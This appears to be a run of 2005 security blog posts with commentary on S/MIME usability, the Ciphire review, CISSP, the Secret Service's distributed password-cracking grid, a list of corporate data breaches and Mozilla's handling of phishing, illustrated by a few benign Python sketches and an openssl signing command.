I'd like to develop the idea of a forum for peer-reviewing papers, introduced in a previous post. To recap, I suggested a sort of pre-publication review circle, which was basically derived from Adam's thoughts on non-academic peer-review.
I've found there are about half a dozen papers out there that would benefit from this process. That's a promising start! Each of these papers lacks the polish gained from peer attention, and I know from my own work that I can get my thoughts down fairly easily, but it takes the critical attention of skeptics to move from muddle to polish.
I think there's a definite need. Here are some trial guidelines, though they are just notes I jotted down. Comments definitely demanded!
Stefan spotted a new patent awarded to Microsoft for a minor variant on blinded signatures and, adding it to a few other clues, muses that they may be about to launch some privacy system based on Chaumian blinding. I doubt this very much, so I'll get the skepticism up front.
Microsoft does not, as a rule, experiment with "new stuff" or unproven stuff, and blinded signatures in the marketplace would have to fall into the unproven category. Microsoft's role in society is to absorb, borg-like, the innovations of other companies, and this would be a step outside that mould. Every other time they've done the innovation thing, it has mucked up on them, and students of innovation know why.
There is a plausible theory that they will use this as a teaser for the marketplace. That would be all well and good; blinded signatures in use for any purpose would raise the penny stock of cryptography above its current de-listed level. But the real privacy question is in the architecture, and as Stefan pointed out earlier today, the challenge they will face is avoiding being caught in doublespeak, and that goes for internal architecture as much as external marketing.
The following article is quite significant. My comments are at the end so as not to bias reading.
washingtonpost.com
DNA Key to Decoding Human Factor
Secret Service's Distributed Computing Project Aimed at Decoding Encrypted Evidence
By Brian Krebs washingtonpost.com Staff Writer Monday, March 28, 2005; 6:48 AM
For law enforcement officials charged with busting sophisticated financial crime and hacker rings, making arrests and seizing computers used in the criminal activity is often the easy part.
More difficult can be making the case in court, where getting a conviction often hinges on whether investigators can glean evidence off of the seized computer equipment and connect that information to specific crimes.
The wide availability of powerful encryption software has made evidence gathering a significant challenge for investigators. Criminals can use the software to scramble evidence of their activities so thoroughly that even the most powerful supercomputers in the world would never be able to break into their codes. But the U.S. Secret Service believes that combining computing power with gumshoe detective skills can help crack criminals' encrypted data caches.
Taking a cue from scientists searching for signs of extraterrestrial life and mathematicians trying to identify very large prime numbers, the agency best known for protecting presidents and other high officials is tying together its employees' desktop computers in a network designed to crack passwords that alleged criminals have used to scramble evidence of their crimes -- everything from lists of stolen credit card numbers and Social Security numbers to records of bank transfers and e-mail communications with victims and accomplices.
To date, the Secret Service has linked 4,000 of its employees' computers into the "Distributed Networking Attack" program. The effort started nearly three years ago to battle a surge in the number of cases in which savvy computer criminals have used commercial or free encryption software to safeguard stolen financial information, according to DNA program manager Al Lewis.
"We're seeing more and more cases coming in where we have to break encryption," Lewis said. "What we're finding is that criminals who use encryption usually are higher profile and higher value targets for us because it means from an evidentiary standpoint they have more to hide."
Each computer in the DNA network contributes a sliver of its processing power to the effort, allowing the entire system to continuously hammer away at numerous encryption keys at a rate of more than a million password combinations per second.
The strength of any encryption scheme is based largely on the complexity of its algorithm -- the mathematical formula used to scramble the data -- and the length of the "key" required to encode and unscramble the information. Keys consist of long strings of binary numbers or "bits," and generally the greater number of bits in a key, the more secure the encryption.
Many of the encryption programs used widely by corporations and individuals provide up to 128- or 256-bit keys. Breaking a 256-bit key would likely take eons using today's conventional "dictionary" and "brute force" decryption methods -- that is, trying word-based, random or sequential combinations of letters and numbers -- even on a distributed network many times the size of the Secret Service's DNA.
"In most cases, there's a greater probability that the sun will burn out before all the computers in the world could factor in all of the information needed to brute force a 256-bit key," said Jon Hansen, vice president of marketing for AccessData Corp, the Lindon, Utah, company that built the software that powers DNA.
Yet, like most security systems, encryption has an Achilles' heel -- the user. That's because some of today's most common encryption applications protect keys using a password supplied by the user. Most encryption programs urge users to pick strong, alphanumeric passwords, but far too often people ignore that critical piece of advice, said Bruce Schneier, an encryption expert and chief technology officer at Counterpane Internet Security Inc. in Mountain View, Calif.
"Most people don't pick a random password even though they should, and that's why projects like this work against a lot of keys," Schneier said. "Lots of people -- even the bad guys -- are really sloppy about choosing good passwords."
Armed with the computing power provided by DNA and a treasure trove of data about a suspect's personal life and interests collected by field agents, Secret Service computer forensics experts often can discover encryption key passwords.
In each case in which DNA is used, the Secret Service has plenty of "plaintext" or unencrypted data resident on the suspect's computer hard drive that can provide important clues to that person's password. When that data is fed into DNA, the system can create lists of words and phrases specific to the individual who owned the computer, lists that are used to try to crack the suspect's password. DNA can glean word lists from documents and e-mails on the suspect's PC, and can scour the suspect's Web browser cache and extract words from Web sites that the individual may have frequented.
"If we've got a suspect and we know from looking at his computer that he likes motorcycle Web sites, for example, we can pull words down off of those sites and create a unique dictionary of passwords of motorcycle terms," the Secret Service's Lewis said.
DNA was developed under a program funded by the Technical Support Working Group -- a federal office that coordinates research on technologies to combat terrorism. AccessData's various offerings are currently used by nearly every federal agency that does computer forensics work, according to Hansen and executives at Pasadena, Calif.-based Guidance Software, another major player in the government market for forensics technology.
Hansen said AccessData has learned through feedback with its customers in law enforcement that between 40 and 50 percent of the time investigators can crack an encryption key by creating word lists from content at sites listed in the suspect's Internet browser log or Web site bookmarks.
"Most of the time this happens the password is some quirky word related to the suspect's area of interests or hobbies," Hansen said.
Hansen recalled one case several years ago in which police in the United Kingdom used AccessData's technology to crack the encryption key of a suspect who frequently worked with horses. Using custom lists of words associated with all things equine, investigators quickly zeroed in on his password, which Hansen says was some obscure word used to describe one component of a stirrup.
Having the ability to craft custom dictionaries for each suspect's computer makes it exponentially more likely that investigators can crack a given encryption code within a timeframe that would be useful in prosecuting a case, said David McNett, president of Distributed.net, created in 1997 as the world's first general-purpose distributed computing project.
"If you have a whole hard drive of materials that could be related to the encryption key you're trying to crack, that is extremely beneficial," McNett said. "In the world of encrypted [Microsoft Windows] drives and encrypted zip files, four thousand machines is a sizable force to bring to bear."
It took DNA just under three hours to crack one file encrypted with WinZip -- a popular file compression and encryption utility that offers 128-bit and 256-bit key encryption. That attack was successful mainly because investigators were able to build highly targeted word lists about the suspect who owned the seized hard drive.
Other encrypted files, however, are proving far more stubborn.
In a high-profile investigation last fall, code-named "Operation Firewall," Secret Service agents infiltrated an Internet crime ring used to buy and sell stolen credit cards, a case that yielded more than 30 arrests but also huge amounts of encrypted data. DNA is still toiling to crack most of those codes, many of which were created with a formidable grade of 256-bit encryption.
Relying on a word-list approach to crack keys becomes far more complex when dealing with suspects who communicate using a mix of languages and alphabets. In Operation Firewall, for example, several of the suspects routinely communicated online in English, Russian and Ukrainian, as well as a mishmash of the Cyrillic and Roman alphabets.
The Secret Service also is working on adapting DNA to cope with emergent data secrecy threats, such as an increased criminal use of "steganography," which involves hiding information by embedding messages inside other, seemingly innocuous messages, music files or images.
The Secret Service has deployed DNA to 40 percent of its internal computers at a rate of a few PCs per week and plans to expand the program to all 10,000 of its systems by the end of this summer. Ultimately, the agency hopes to build the network out across all 22 federal agencies that comprise the Department of Homeland Security: It currently holds a license to deploy the network out to 100,000 systems.
Unlike other distributed networking programs, such as the Search for Extra Terrestrial Intelligence Project -- which graphically display their number-crunching progress when a host computer's screen saver is activated -- DNA works silently in the background, completely hidden from the user. Lewis said the Secret Service chose not to call attention to the program, concerned that employees might remove it.
"Computer users often experience system lockups that are often inexplicable, and many users will uninstall programs they don't understand," Lewis said. "As the user base becomes more educated with the program and how it functions, we certainly retain the ability to make it more visible."
In the meantime, the agency is looking to partner with companies in the private sector that may have computer-processing power to spare, though Lewis declined to say which companies the Secret Service was approaching. Such a partnership would not endanger the secrecy of their operations, Lewis said, because any one partner would be given only tiny snippets of an entire encrypted message or file.
Distributed.net's McNett said he understands all too well the agency's desire for additional computing power.
"There will be such a thing as 'too much computing power' as soon as you can crack a key 'too quickly,' which is to say 'never' in the Secret Service's case."
© 2005 TechNews.com
So here's my comment. Up until now, we've known that groups like the NSA and GCHQ have had the capability to crunch bigger keys and do better searches. Yet they are not threats to the world, because their information is kept secret; they can't reveal their discoveries without risking their edge. Perversely, it doesn't matter whether they can break our crypto, as our secret and their secret are both safe with them.
But any policing force is a different matter. The US Secret Service is just another policing agency, one with two missions: protecting the currency, and the more famous bodyguard role. They have no special need to keep their discoveries secret; in fact quite the reverse, as like all policing forces they pander to the big bust and the exposure-seeking press release. They are by definition threats to the common man.
And they're talking about cooperating with other departments, both to share data and to share compute resource. Think J. Edgar Hoover with a grid; it matters not that they are the good guys, it's all about incentives tomorrow, not today's recruitment poster.
In sum, up until now, nobody threatening had access to 10,000 machines. Now they do. Give it another year and I'll bet every large force in the USA and a half-dozen in other countries will have installed their screen-saver-style grids. The threat meter has shifted up a few dozen bits for the ordinary person.
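To put rough numbers on that shift, here's a back-of-envelope Python sketch. The million-guesses-per-second rate is the article's figure; the dictionary sizes are round numbers of my own choosing:

```python
import math

guesses_per_second = 1_000_000            # the whole DNA grid, per the article

# A 256-bit key, searched exhaustively: never going to happen.
key_years = 2**256 / guesses_per_second / (3600 * 24 * 365)
print(f"raw key: {key_years:.1e} years")  # ~3.7e63 years

# A human password drawn from a custom dictionary: 100,000 harvested
# words with 50 mutations each is only ~22 bits of effective keyspace.
password_space = 100_000 * 50
print(f"effective bits: {math.log2(password_space):.0f}")
print(f"searched in {password_space / guesses_per_second:.0f} seconds")
```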
(That's the bad news. The good news was that it was a good article.)
Poking around on Ciphire's website I discovered a review by Bruce Schneier of the architecture. It follows on from an earlier one by Russ Housley and Niels Ferguson. Here are some meta-comments on the second review.
Firstly, Bruce indicates that the system is vulnerable to an MITM attack in which the attacker inserts false reply information and then redirects the user to email back to an address/key the attacker happens to hold. Bruce says this is hard to deal with, but I wonder about that: this is what SSH defends against. If the client can keep track of the certs it has downloaded, surely it should be able to warn of changes, either by history tracking or user labelling (petnames, logos etc). Indeed, it seems that a lot of the later attacks can be dealt with by not trusting the PKI every time it says "trust me."
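As a minimal sketch of what I mean - a client-side fingerprint cache in the SSH style, with every filename hypothetical:

```python
import hashlib
import json
from pathlib import Path

CACHE = Path.home() / ".cert_history.json"   # hypothetical client-side store

def check_cert(email, cert_der):
    """SSH-style continuity check: warn when a correspondent's cert changes."""
    seen = json.loads(CACHE.read_text()) if CACHE.exists() else {}
    fingerprint = hashlib.sha256(cert_der).hexdigest()
    if email not in seen:
        seen[email] = fingerprint
        CACHE.write_text(json.dumps(seen))
        return "NEW: first cert for this address -- label it (petname, logo)"
    if seen[email] != fingerprint:
        return "WARNING: cert changed since last contact -- possible MITM"
    return "OK: same cert as every previous time"
```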
Secondly, Bruce talks about the insider code injection attack. Yes, a tough one. Publishing the code - which Ciphire have indicated they will do - helps there, and as mentioned this is _necessary but not sufficient_, as eyeballs are limited even then.
But there are further steps that will be left undone: Open Source, Open Standards and Open Competition. Open source walks hand in hand with open standards, and open standards encourage competing implementations. Here we see the often bitter and twisted relationship between the PGP Inc and GnuPG teams - which we cheer and applaud, because while they fight each other, their code gets better and better, and more and more secure.
No such luck for Ciphire; even when they publish the source, it would take a masochist of maniacal proportions to download it, print it and start reading it. I well remember Lucky Green walking into HIP with boxes and boxes of PGP source. And I do mean boxes; a figure of 20 sticks in my mind, and I have no idea why. A team of about a dozen of us worked flat out for about 2 days to finish the last 1% of the errors in the source scanning. And we didn't have time to dally on this comment or that buffer overflow...
So Ciphire aren't going to see as much benefit from the publication of their source as they might hope, but for all that it certainly adds to the confidence if they do publish.
Thirdly, what's the _security signal_ in posted reviews? Well, it's all well and good that someone famous did a review. That's presumably for money, and any crypto guy knows you get what you pay for. That's grand, but what strikes me is not the review, but the problems found. Problems were found - see above - and Ciphire still printed the review!
So I propose a new signal: disclosure of own shortfalls, weaknesses, attacks. As Ciphire has gone ahead and published a critique with lines of attack within it, they've drawn out the worst that can happen to them. This does more than just give slashdotters something to get excited over, it actually tells the world where the security stops. That's a valuable thing.
Some people swear by them. Others think they are just paper. What are they really? I am minded of Stigler's observation that, paraphrased, all certifications are eventually captured by their stakeholders. Here is a Register article that bemoans one such certification dropping its practical test and reducing itself to boot camp / brain dump status.
I have no certifications, and I can declare myself clearly on this: given what I already know, it would be uneconomic to obtain one. Frankly, it is always better to study something you know little of (like an MBA) than something you already know a lot of (like how to build a payment system - the pinnacle of security problems because, unlike other areas, you are guaranteed to have real threats).
I recently looked at CISSP (as described in the above article). With some hope, I downloaded their PDF, after tentatively signing my life away because of their fear of revealing their deepest security secrets to some potential future student. Yet what was in the PDF was ... less than in any half-dozen articles in any net rag with "security" in its name. Worse, the PDF finishes with a 2 or 3 page list of references with no organisation, and no hope of anyone reading or even finding more than a few of them.
So in contrast to what today's article suggests, CISSP is already set up as a funnel for revenue purposes. When a certification draws you in to purchase the expensive training materials, then you know they are on the road to degree mills, simply because they no longer have a single security goal. Now they have a revenue incentive ... it's only a matter of time before they forget their original purpose.
Which all leads to the other side of the coin: if an employer is impressed by your certification, then that employer hasn't exactly thought it through. Not so impressive in return; do you really want to do security work for an organisation that has already reduced its security process to borrowing other organisations' best practices? (Which leads to the rather difficult question of how to identify an organisation that thinks for itself in security matters. Another difficult problem in security signalling!)
So what does an employer do to find out if someone knows any security? How does an _individual_ signal to the world that he or she knows something about the subject? Another question, another day!
Rarely does anyone bother to sit down and ponder why the world is so crazy, and ask why those people over on the other side are so different. Asking questions is anathema to the times we live in, and I have living proof of that: I occasionally throw out completely unbelievable statements and rarely, if ever, am I asked about them. I'm told, I'm challenged, and I'm damned. But never asked...
So it is with some surprise that an American (!) has sat down and thought about why Europeans email the way they do, and why Americans email the way they do. A thoughtful piece. Once you've read it, I'd encourage you to try something different: ask a question, try and work out the answer.
(Oh, and the relevance to Financial Cryptography is how people communicate and don't communicate, where communication is the meta-problem that FC is trying to solve. Thanks to Jeroen for the pointer... And for a more amusing perspective on asking questions, try Dilbert.)
Euromail
What Germans can teach us about e-mail.
By Eric Weiner
Posted Friday, March 25, 2005, at 4:17 AM PT
North America and Europe are two continents divided by a common technology: e-mail. Techno-optimists assure us that e-mail—along with the Internet and satellite TV—make the world smaller. That may be true in a technical sense. I can send a message from my home in Miami to a German friend in Berlin and it will arrive almost instantly. But somewhere over the Atlantic, the messages get garbled. In fact, two distinct forms of e-mail have emerged: Euromail and Amerimail.
Amerimail is informal and chatty. It's likely to begin with a breezy "Hi" and end with a "Bye." The chances of Amerimail containing a smiley face or an "xoxo" are disturbingly high. We Americans are reluctant to dive into the meat of an e-mail; we feel compelled to first inform hapless recipients about our vacation on the Cape which was really excellent except the jellyfish were biting and the kids caught this nasty bug so we had to skip the whale watching trip but about that investors' meeting in New York. ... Amerimail is a bundle of contradictions: rambling and yet direct; deferential, yet arrogant. In other words, Amerimail is America.
Euromail is stiff and cold, often beginning with a formal "Dear Mr. X" and ending with a brusque "Sincerely." You won't find any mention of kids or the weather or jellyfish in Euromail. It's all business. It's also slow. Your correspondent might take days, even weeks, to answer a message. Euromail is also less confrontational in tone, rarely filled with the overt nastiness that characterizes American e-mail disagreements. In other words, Euromail is exactly like the Europeans themselves. (I am, of course, generalizing. German e-mail style is not exactly the same as Italian or Greek, but they have more in common with each other than they do with American mail.)
These are more than mere stylistic differences. Communication matters. Which model should the rest of the world adopt: Euromail or Amerimail?
A California-based e-mail consulting firm called People-onthego sheds some light on the e-mail divide. It recently asked about 100 executives on both sides of the Atlantic whether they noticed differences in e-mail styles. Most said yes. Here are a few of their observations:
"Americans tend to write (e-mails) exactly as they speak."
"Europeans are less obsessive about checking e-mail."
"In general, Americans are much more responsive to email—they respond faster and provide more information."
One respondent noted that Europeans tend to segregate their e-mail accounts. Rarely do they send personal messages on their business accounts, or vice versa. These differences can't be explained merely by differing comfort levels with technology. Other forms of electronic communication, such as SMS text messaging, are more popular in Europe than in the United States.
The fact is, Europeans and Americans approach e-mail in a fundamentally different way. Here is the key point: For Europeans, e-mail has replaced the business letter. For Americans, it has replaced the telephone. That's why we tend to unleash what e-mail consultant Tim Burress calls a "brain dump": unloading the content of our cerebral cortex onto the screen and hitting the send button. "It makes Europeans go ballistic," he says.
Susanne Khawand, a German high-tech executive, has been on the receiving end of American brain dumps, and she says it's not pretty. "I feel like saying, 'Why don't you just call me instead of writing five e-mails back and forth,' " she says. Americans are so overwhelmed by their bulging inboxes that "you can't rely on getting an answer. You don't even know if they read it." In Germany, she says, it might take a few days, or even weeks, for an answer, but one always arrives.
Maybe that's because, on average, Europeans receive fewer e-mails and spend less time tending their inboxes. An international survey of business owners in 24 countries (conducted by the accounting firm Grant Thornton) found that people in Greece and Russia spend the least amount of time dealing with e-mail every day: 48 minutes on average. Americans, by comparison, spend two hours per day, among the highest in the world. (Only Filipinos spend more time on e-mail, 2.1 hours.) The survey also found that European executives are skeptical of e-mail's ability to boost their bottom line.
It's not clear why European and American e-mail styles have evolved separately, but I suspect the reasons lie within deep cultural differences. Americans tend to be impulsive and crave instant gratification. So we send e-mails rapid-fire, and get antsy if we don't receive a reply quickly. Europeans tend to be more methodical and plodding. They send (and reply to) e-mails only after great deliberation.
For all their Continental fastidiousness, Europeans can be remarkably lax about e-mail security, says Bill Young, an executive vice president with the Strickland Group. Europeans are more likely to include trade secrets and business strategies in e-mails, he says, much to the frustration of their American colleagues. This is probably because identity theft—and other types of hacking—are much less of a problem in Europe than in the United States. Privacy laws are much stricter in Europe.
So, which is better: Euromail or Amerimail? Personally, I'm a convert—or a defector, if you prefer—to the former. I realize it's not popular these days to suggest we have anything to learn from Europeans, but I'm fed up with an inbox cluttered with rambling, barely cogent missives from friends and colleagues. If the alternative is a few stiffly written, politely worded bits of Euromail, then I say … bring it on.
Thanks to Pierre Khawand for research assistance.
Eric Weiner is a correspondent for NPR's Day to Day program.
Article URL: http://slate.msn.com/id/2115223/
Until recently, security breaches were generally hushed up. A California law (SB1386) requiring that victims be notified of losses of identity information was passed in 2002 and came into effect mid-2003, which had the effect of springing a mandated leak in the secrecy of breaches across corporate and government USA.
At first a steady trickle of smaller breaches garnered minor press attention. Then Choicepoint burst into the public consciousness in February 2005, due to several factors. This major breach not only caused a major dip in the company's share price, but also triggered a wave of similar revelations (see "ID theft is inescapable" below for a long list).
Such public exposure of breaches is unprecedented. Either we have just observed a spike in actual breaches and this is truly Mad March, or the breaches are normal, but the disclosure is abnormal.
Anecdotal evidence in the security industry supports the latter theory. (One example.) We've always known that massive breaches were happening; stories have persistently circulated in security circles ever since companies started hooking databases up to Internet servers. I feel pretty darn safe in putting the finger on SB1386 and Choicepoint as having changed the way things are now done (and let's not forget Schechter and Smith's FC03 paper, which argued for more disclosure).
(Editorial note: this is posted because I need a single reference to the list of disclosures, rather than a squillion URLs. As additional disclosures come in I might simply add them to the list. For a comprehensive list of posts, see Adam's Choicepoint category. Adam also points at David Fraser's list of privacy incidents. And another list.)
By Thomas C Greene in Washington
Published Wednesday 23rd March 2005 12:29 GMT
March 2005 might make history as the apex of identity theft disclosures. Privacy invasion outfit ChoicePoint, payroll handler PayMaxx, Bank of America, Lexis Nexis, several universities, and a large shoe retailer called DSW all lost control of sensitive data concerning millions of people.
Credit card and other banking details, names, addresses, phone numbers, Social Security numbers, and dates of birth have fallen into the hands of potential identity thieves. The news could not be worse.
In March 2005 alone:
California State University at Chico notified 59,000 students, faculty, and staff that their details had been kept on a computer compromised by remote intruders. The haul included names, addresses and Social Security numbers.
Boston College notified 120,000 of its alumni after a computer containing their addresses and Social Security numbers was compromised by an intruder.
Shoe retailer DSW notified more than 100,000 customers of a remote break-in of the company's computerized database of 103 of the chain's 175 stores.
Privacy invasion outfit Seisint, a contributor to the MATRIX government dossier system, now owned by Reed Elsevier, confessed to 32,000 individuals that its Lexis Nexis databases had been compromised.
Privacy invasion outfit ChoicePoint confessed to selling the names, addresses and Social Security numbers of more than 150,000 people to criminals.
Bank of America confessed to losing backup tapes containing the financial records of 1.2 million federal employees.
Payroll outsourcer PayMaxx foolishly exposed more than 25,000 of its customers' payroll records on line.
Desktop computers belonging to government contractor Science Applications International Corp (SAIC) were stolen, exposing the details of stockholders past and present, many of them heavy hitters in the US government, such as former Defense Secretaries William Perry and Melvin Laird, former CIA Director John Deutch, former CIA Deputy Director Bobby Ray Inman, former Chief Weapons Inspector in Iraq David Kay, and former chief counter-terror advisor General Wayne Downing.
Cell phone provider T-Mobile admitted that an intruder gained access to 400 of its customers' personal information.
George Mason University confessed that a remote intruder had gained access to the personal records of 30,000 students, faculty, and staff.
To which we can add: the Department of Homeland Security's Transportation Security Administration, Northwestern University's Kellogg School of Management, Nevada's Department of Motor Vehicles, legal data collector Westlaw, the University of Nevada, and the University of California, Berkeley.
My first foray into S/MIME is ongoing. I say "ongoing" because it took three attempts to get it going, but I now have signing working! The first attempt was with the help of one of CACert's experts, and within 10 minutes or so of massive clicking around, I had a cert installed in my Thunderbird.
10 minutes to create a cert is total failure right there. There should be ONE button and it should take ONE second. No excuses. The notion that I need a cert to tell other people who I am - people who already know me - is so totally off the charts that there are no words to describe it. None that are polite, anyway.
(Actually, there shouldn't even be a button, it should be created when the email account is created! Thanks to Julien for that observation.)
Anyway, to be a crypto scribbler these days one has to have an open mind to all cryptosystems, no matter who designed them, so I plough on with the project to get S/MIME working. No matter how long it takes. Whip me again, please.
There are three further signing problems with S/MIME I've seen today, beyond the lack of the button to make it work.
Firstly, it seems that key exchange is based on signed messages. The distribution of your public key only happens when you sign a message! Recalling yesterday's recommendation on S/MIME signing (do not sign messages unless you know what that means), this represents a barrier to deployment. The workaround is to send nonsense signed messages to the people you want to communicate with, but to otherwise turn signing off. Techies will say that's just stoopid, but consider this: it's just what your lawyer would say, and you don't want to be the first one to feel really stoopid in front of the judge.
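As a sketch of that workaround, here is the signing step driven from Python. It assumes an openssl binary on the path, and all the filenames are hypothetical:

```python
import subprocess

# Sign a throwaway message purely so the recipient's mail client
# captures our certificate; real correspondence then goes unsigned.
subprocess.run(
    ["openssl", "smime", "-sign",
     "-in", "hello.txt",          # body: "please ignore, this just carries my cert"
     "-signer", "mycert.pem",     # our S/MIME certificate
     "-inkey", "mykey.pem",       # the matching private key
     "-out", "signed.eml"],       # send this once; signing stays off thereafter
    check=True,
)
```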
Secondly, Daniel says that implementations first encrypt a message and then sign it. That means that to show that a message is signed, you must de-sign it *and* decrypt it in one operation. As only the owner has the key to decrypt, only the owner can show it is signed! Dispute resolution is looking messy, even buggy. How can anyone be sure that a signed message is indeed signed if there are layers separating message from signature? The RFC says:
In general, the best strategy is to "be liberal in what you receive and conservative in what you send"
Which might be good advice in Gnuland, but it is not necessarily the best security advice. (I think Dan Bernstein said that.) Further, this puts the application in a big dilemma. To properly look after messages, they should be decrypted and then re-encrypted within the local database using local keys. Otherwise the message is forever dependent on that one cert, right?! (Revoke the cert, revoke all messages?)
But if the message is decrypted, the signature is lost, so the signature can only ever form part of a message integrity function. Luckily, the RFC goes on to say that one can sign and encrypt in any order, so this would seem to be an implementation issue.
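To see why the ordering matters, here is a toy Python sketch. The sign and encrypt functions are stand-ins of my own, not a real CMS library:

```python
# Toy stand-ins for a CMS library -- illustrative only, no real crypto.
def sign(blob: bytes, key: str) -> bytes:
    return b"SIG[" + key.encode() + b"]" + blob

def encrypt(blob: bytes, key: str) -> bytes:
    return b"ENC[" + key.encode() + b"]" + blob

def sign_then_encrypt(msg: bytes) -> bytes:
    # Signature is innermost: only the holder of the decryption key can
    # even show that a signature exists -- the dispute problem above.
    return encrypt(sign(msg, "alice-sig"), "bob-enc")

def encrypt_then_sign(msg: bytes) -> bytes:
    # Signature is outermost: anyone can check it without decrypting,
    # but what it covers is opaque ciphertext, not the message itself.
    return sign(encrypt(msg, "bob-enc"), "alice-sig")
```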
That's good news. And (thirdly) it also takes the edge off of the RFC's suggestion that signatures are non-repudiable. FCers know well that humans repudiate, and dumb programs can't do a darn thing about it.
In a paper (sorry, PDF only) last month at FC05, Garfinkel and friends reported on an interesting survey conducted in two communities of merchants, one which received signed email from a supplier, and one which did not. This was an unusual chance to test two groups distinguished by usage of a crypto tool.
The biggest result to my mind is that users simply didn't, as a body, understand what the signed emails were all about. Even though these merchants were dealing with valuable transactions, the group that was receiving signed email did only a little better than the control group in knowing it (33% as opposed to 20%). This is a confusion I'd expect; I recently installed a good cert into my Thunderbird and I still cannot send out signed or encrypted email using S/MIME (I forget why).
It's a very valuable survey, and a welcome addition to the work of Ping, Friedman, et al, and of course Simson Garfinkel's thesis. I've copied the Conclusion below, as anyone involved with email or user security should be aware of how real systems meet real users.
But there is one area where I take exception. Garfinkel et al believe that commercial entities "should immediately adopt the practice of digitally-signing their mail to customers with S/MIME signatures using a certificate signed by a widely-published CA such as VeriSign."
Strongly Disagree! As there is nothing in the paper that indicates the meaning of a digital signature, this is a bad recommendation. Are they asking merchants to take on unlimited liability? Is this simply a protection against forged emails? Or a checksum against network corruption? Without some thought as to what it is the merchant is promising, I'd recommend that signing be left off.
(Encryption, on the other hand, is fine. We can never have enough encryption. But this survey didn't cover that.)
Views, Reactions and Impact of Digitally-Signed Mail in e-Commerce
Abstract. We surveyed 470 Amazon.com merchants regarding their experience, knowledge and perceptions of digitally-signed email. Some of these merchants (93) had been receiving digitally-signed VAT invoices from Amazon for more than a year. Respondents' attitudes were measured as to the role of signed and/or sealed mail in e-commerce. Among our findings: 25.2% of merchants thought that receipts sent by online merchants should be digitally-signed, 13.2% thought they should be sealed with encryption, and 33.6% thought that they should be both signed and sealed. Statistically-significant differences between merchants who had received the signed mail and those who had not are noted. We conclude that Internet-based merchants should send digitally-signed email as a best practice, even if they think that their customers will not understand the signatures, on the grounds that today's email systems handle such signatures automatically and the passive exposure to signatures appears to increase acceptance and trust.
4 Conclusions and Policy Implications
We surveyed hundreds of people actively involved in the business of e-commerce as to their views on and experience with digitally-signed email. Although they had not received prior notification of the fact, some of these individuals had been receiving digitally-signed email for more than a year. To the best of our knowledge this is the first survey of its kind.
It is widely believed that people will not use cryptographic techniques to protect email unless it is extraordinarily easy to use. We showed that even relatively unsophisticated computer users who do not send digitally-signed mail nevertheless believe that it should be used to protect the email that they themselves are sending (and to a lesser extent, receiving as well).
We believe that digitally-signed mail could provide some measure of defense against phishing attacks. Because attackers may try to obtain certificates for typo or copycat names, we suggest that email clients should indicate the difference between a certificate that had been received many times and one that is being received for the first time much in the way that programs implementing the popular SSH protocol [15] alert users when a host key has changed.
We found that the majority (58.5%) of respondents did not know whether or not the program that they used to read their mail handled encryption, even though the vast majority (81.1%) use such mail clients. Given this case, companies that survey their customers as to whether or not the customers have encryption-capable mail readers are likely to yield erroneous results.
We learned that digitally-signed mail tends to increase the recipient's trust in the email infrastructure. We learned that despite more than a decade of confusion over multiple standards for secure email, there are now few if any usability barriers to receiving mail that's digitally-signed with S/MIME signatures using established CAs.
Finally, we found that people with no obvious interest in selling or otherwise promoting cryptographic technology believe that many email messages sent today without protection should be either digitally-signed, sealed with encryption, or both.
The complete survey text with simple tabulations of every question and all respondent comments for which permission was given to quote is at http://www.simson.net/smime-survey.html.
4.1 Recommendations
We believe that financial organizations, retailers, and other entities doing business on the Internet should immediately adopt the practice of digitally-signing their mail to customers with S/MIME signatures using a certificate signed by a widely-published CA such as VeriSign. Software for processing such messages is widely deployed. As one of our respondents who identified himself as a very sophisticated computer user wrote:
I use PGP, but in the several years since I have installed it I have never used it for encrypting email, or sending signed email. I have received and verified signed email from my ISP. I have never received signed email from any other source (including banks, paypal, etc, which are the organisations I would have thought would have gained most from its use).
Given that support for S/MIME signatures is now widely deployed, we also believe that existing mail clients and webmail systems that do not recognize S/MIME-signed mail should be modified to do so. Our research shows that there is significant value for users in being able to verify signatures on signed email, even without the ability to respond to these messages with mail that is signed or sealed.
We also believe that existing systems should be more lenient with mail that is digitally-signed but which fails some sort of security check. For example, Microsoft Outlook and Outlook Express give a warning if a message is signed with a certificate that has expired, or if a certificate is signed by a CA that is not trusted. We believe that such warnings only confuse most users; more useful would be a warning that indicates when there is a change in the distinguished name of a correspondent, or even when the sender's signing key changes, indicating a possible phishing attack.
Adam points to an essay by Paul Graham on A Unified Theory of VC Suckage. Sure, I guess, and if you like learning how and why, read it and also Adam's comments. Meanwhile, I'll just leave you with this amusing footnote:
[2] Since most VCs aren't tech guys, the technology side of their due diligence tends to be like a body cavity search by someone with a faulty knowledge of human anatomy. After a while we were quite sore from VCs attempting to probe our nonexistent database orifice. No, we don't use Oracle. We just store the data in files. Our secret is to use an OS that doesn't lose our data. Which OS? FreeBSD. Why do you use that instead of Windows NT? Because it's better and it doesn't cost anything. What, you're using a freeware OS?
How many times that conversation was repeated. Then when we got to Yahoo, we found they used FreeBSD and stored their data in files too.
Flat files rule.
(It turns out that the term of art for "we just use files on FreeBSD" is flat files. They are much more common than people would admit, especially among old timers who've got that "been there, done that" experience of seeing their entire database puff into smoke because someone plugged in a hair dryer or the latest security patch just blew away access to that new cryptographic filesystem with journalling mirrored across 2 continents, a cruise liner and a nuclear bunker. Flat files really do rule OK. Anyway, back to debugging my flat file database ...)
Over at Mozilla, the honeymoon is definitely over, as no less than Symantec's CEO points out that just because a browser is popular and open source doesn't mean it's secure. The full story. There is one weak comment from Mitchell Baker, of Mozilla, that is easy to dispose of:
"There is this idea that market share alone will make you have more vulnerabilities," Baker said. "It is not relational at all."
That's, um, slightly wrong. You create the vulnerabilities, and market share finds 'em. We can show it empirically, logically or economically, you pick. Not to worry. Now, I have a fond hope that Mozilla can show the way ahead in phishing, being open source and all that, but this has got me totally bemused:
In general, classic code flaws tend to be fairly easy to fix once they are found, she said. More difficult problems to guard against are the ones that exploit human behavior, like phishing. "In some of these cases, the solution is very difficult to determine," she said. "There are some circumstances where the speed won't be as fast."
With barely disguised politeness, I have to question this. While I'm happy that phishing is belatedly on the table, what does it mean that the solution is difficult to determine?
If there is a question of how to handle phishing, then ask?! We've been talking about fixing phishing for an entire YEAR now on Mozilla's own crypto and security groups. There are bugs filed, and there is no shortage of clues planted. Keyboards have smoked with the volume of emails, posts, and documents. GOOD ideas on fixing phishing will flood in faster than you can say "go-fish". There are at least two, maybe 3 or 4, completely coded-up solutions running in Mozilla already! Today!
What's difficult about it all? Maybe it hasn't been said today. Here's how to do it: download trustbar.mozdev.org and do that.
Couldn't be simpler.
